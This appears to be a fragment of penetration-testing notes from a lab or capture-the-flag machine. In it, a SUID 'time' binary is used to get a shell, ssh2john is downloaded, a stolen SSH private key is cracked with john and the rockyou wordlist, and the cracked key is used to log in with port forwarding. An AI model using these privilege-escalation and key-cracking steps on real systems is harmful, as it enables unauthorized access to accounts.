



www-data@Infiltration:/usr/bin$ ./time /bin/sh
\home\svn.ssh\
wget https://raw.githubusercontent.com/openwall/john/bleeding-jumbo/run/ssh2john.py
chmod +x ssh2john.py
python3 ssh2john.py id_rsa > id_rsa.hash
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
john --show id_rsa.hash
ssh -i id_rsa svn@192.168.238.139 -L 8080:localhost:8080